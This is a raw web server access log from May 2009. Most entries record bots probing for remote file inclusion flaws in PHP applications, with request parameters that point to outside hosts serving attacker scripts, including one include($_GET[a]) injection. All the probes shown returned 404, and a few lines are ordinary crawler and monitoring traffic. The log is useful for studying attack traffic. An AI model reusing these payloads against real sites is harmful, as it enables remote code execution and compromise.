217.147.29.190 - - [17/May/2009:06:46:42 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
94.198.214.29 - - [17/May/2009:06:46:44 -0400] "GET /logs/access_log.Q108122300/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
217.147.29.190 - - [17/May/2009:06:46:46 -0400] "GET /logs/access_log.Q108122300/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
94.198.214.29 - - [17/May/2009:06:46:49 -0400] "GET /logs/access_log.Q108122300/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
217.147.29.190 - - [17/May/2009:06:46:51 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:46:52 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:46:52 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.808"
94.198.214.29 - - [17/May/2009:06:46:54 -0400] "GET /logs/access_log.Q108060200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:06:46:54 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:06:46:54 -0400] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
94.198.214.29 - - [17/May/2009:06:46:56 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.805"
217.147.29.190 - - [17/May/2009:06:47:01 -0400] "GET /logs/access_log.Q108052400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:47:05 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:06:47:06 -0400] "GET /logs/access_log.Q108122300/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 283 "-" "libwww-perl/5.808"
193.221.119.126 - - [17/May/2009:06:47:10 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
70.86.169.162 - - [17/May/2009:06:47:10 -0400] "GET /logs/access_log.Q108062100//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:06:47:10 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:06:47:15 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
193.221.119.126 - - [17/May/2009:06:47:20 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
94.198.214.29 - - [17/May/2009:06:47:28 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
124.0.55.34 - - [17/May/2009:06:47:52 -0400] "GET /logs/access_log.Q108120600//components/com_simpleboard/image_upload.php?sbp=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
70.86.169.162 - - [17/May/2009:06:48:01 -0400] "GET /logs/access_log.Q108121900//administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
94.198.214.29 - - [17/May/2009:06:48:11 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.805"
217.147.29.190 - - [17/May/2009:06:48:45 -0400] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://qigong-club.ru//bitrix/admin/vid.txt?? HTTP/1.1" 404 256 "-" "libwww-perl/5.808"
91.206.183.148 - - [17/May/2009:06:49:06 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:49:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.3.226.56 - - [17/May/2009:06:49:23 -0400] "GET /logs/access_log.Q108121400%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.nw.or.kr/bbs/icon/v6.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.79"
91.206.183.148 - - [17/May/2009:06:49:35 -0400] "GET /logs/access_log.Q108100600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.72.114 - - [17/May/2009:06:49:52 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.30.79.49 - - [17/May/2009:06:49:53 -0400] "GET /logs/error_log.Q107062100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.72.114 - - [17/May/2009:06:50:11 -0400] "GET /logs/error_log.Q109011200 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.5.168.93 - - [17/May/2009:06:51:59 -0400] "GET //forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:06:52:07 -0400] "GET /logs//forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:06:52:07 -0400] "GET /logs/access_log.Q109051200//forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:52:58 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [17/May/2009:06:53:13 -0400] "GET /logs/access_log.Q108100600//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:06:53:50 -0400] "GET //forum/?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:06:53:50 -0400] "GET /logs//forum/?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:06:53:50 -0400] "GET /logs/access_log.Q109051200//forum/?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:54:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.86.169.162 - - [17/May/2009:06:55:28 -0400] "GET /logs/access_log.Q109051200//errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:06:55:30 -0400] "GET //errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
70.86.169.162 - - [17/May/2009:06:55:30 -0400] "GET /logs//errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
124.0.55.34 - - [17/May/2009:06:55:38 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:55:38 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:55:38 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.90.91.245 - - [17/May/2009:06:55:52 -0400] "GET /logs/access_log.Q108100700//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:06:55:53 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:06:55:53 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.822"
66.219.97.207 - - [17/May/2009:06:55:56 -0400] "GET /logs/access_log.Q108100700//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:06:55:56 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:06:55:56 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.79"
209.90.91.245 - - [17/May/2009:06:55:59 -0400] "GET /logs/access_log.Q108112400//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.822"
66.219.97.207 - - [17/May/2009:06:56:06 -0400] "GET /logs/access_log.Q108112400//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.79"
124.0.55.34 - - [17/May/2009:06:56:18 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:56:18 -0400] "GET /logs/access_log.Q108090900%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:56:19 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
70.86.169.162 - - [17/May/2009:06:56:27 -0400] "GET /logs/access_log.Q108100600//errors.php?error=http://sunandsea.co.kr/upload/rey.jpg???? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
64.118.90.253 - - [17/May/2009:06:56:45 -0400] "GET /logs/access_log.Q108100700//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:06:56:46 -0400] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 263 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:06:56:46 -0400] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:06:56:52 -0400] "GET /logs/access_log.Q108112400//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.823"
124.0.55.34 - - [17/May/2009:06:58:18 -0400] "GET /logs/access_log.Q108091400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:58:20 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:58:20 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:06:58:27 -0400] "GET /logs/access_log.Q108090100/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:06:58:46 -0400] "GET //employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:06:58:59 -0400] "GET /logs//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:06:59:08 -0400] "GET /logs/access_log.Q109051200//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:06:59:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.24.38 - - [17/May/2009:06:59:59 -0400] "GET /logs/error_log.Q108070800//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:00:00 -0400] "GET /logs/error_log.Q108070800//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:00:00 -0400] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:00:00 -0400] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:00:00 -0400] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:00:00 -0400] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
222.239.76.25 - - [17/May/2009:07:00:19 -0400] "GET /logs/access_log.Q109022600//forum/?sourcedir=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.231.24.38 - - [17/May/2009:07:01:14 -0400] "GET /logs/access_log.Q109010400//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:01:14 -0400] "GET /logs/access_log.Q109010400//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
220.181.7.97 - - [17/May/2009:07:02:23 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
195.5.168.93 - - [17/May/2009:07:02:45 -0400] "GET //forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:07:02:47 -0400] "GET /logs//forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
195.5.168.93 - - [17/May/2009:07:02:50 -0400] "GET /logs/access_log.Q109051200//forum/?sourcedir=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
124.0.55.34 - - [17/May/2009:07:03:39 -0400] "GET /logs/access_log.Q108090900//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
123.125.64.38 - - [17/May/2009:07:03:45 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
222.239.76.25 - - [17/May/2009:07:03:51 -0400] "GET //employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:07:03:51 -0400] "GET /logs//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:07:03:51 -0400] "GET /logs/access_log.Q108120900//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:07:03:51 -0400] "GET /logs/access_log.Q108082500//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:04:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [17/May/2009:07:05:31 -0400] "GET /logs/access_log.Q108120900%20%20//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:05:50 -0400] "GET /logs/access_log.Q108120900//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:05:50 -0400] "GET /logs//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:05:50 -0400] "GET /logs/access_log.Q108082500//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:05:50 -0400] "GET //employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.239.76.25 - - [17/May/2009:07:06:07 -0400] "GET /logs/access_log.Q108082500%20%20//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.bernardyni.ofm.pl/organy2/tmp/temp/id1.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
222.231.24.38 - - [17/May/2009:07:06:07 -0400] "GET /logs/access_log.Q108090300//skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:06:07 -0400] "GET /logs/access_log.Q108090300//skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:06:08 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:06:08 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:06:09 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:06:09 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:07:08 -0400] "GET /logs/error_log.Q108100400//skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
222.231.24.38 - - [17/May/2009:07:07:08 -0400] "GET /logs/error_log.Q108100400//skins/advanced/advanced1.php?pluginpath[0]=http://online.kz/kaz/includes/id.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
124.217.216.86 - - [17/May/2009:07:07:35 -0400] "GET /logs//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:07:07:35 -0400] "GET /logs/access_log.Q108082500//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:07:07:35 -0400] "GET /logs/access_log.Q108120900//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:07:07:35 -0400] "GET //employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:07:38 -0400] "GET /logs/access_log.Q108120900%20%20//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.139.104.104 - - [17/May/2009:07:08:04 -0400] "GET /logs/access_log.Q108082500%20%20//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:07:08:18 -0400] "GET /logs/access_log.Q108120900%20%20//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:07:08:18 -0400] "GET /logs/access_log.Q108082500%20%20//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:07:09:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.173.130.41 - - [17/May/2009:07:11:55 -0400] "GET //ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:11:55 -0400] "GET /logs//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:11:55 -0400] "GET /logs/access_log.Q109020100//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:12:11 -0400] "GET /logs/access_log.Q108062400%20%20//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.173.130.41 - - [17/May/2009:07:12:16 -0400] "GET /logs/access_log.Q109050700%20%20//ashnews.php?pathtoashnews=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
124.217.216.86 - - [17/May/2009:07:12:20 -0400] "GET /logs/access_log.Q109051200//employers/employer_registration.php//?_SERVER[DOCUMENT_ROOT]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
71.254.105.60 - - [17/May/2009:07:12:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
71.254.105.60 - - [17/May/2009:07:12:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 2.0.50727)"
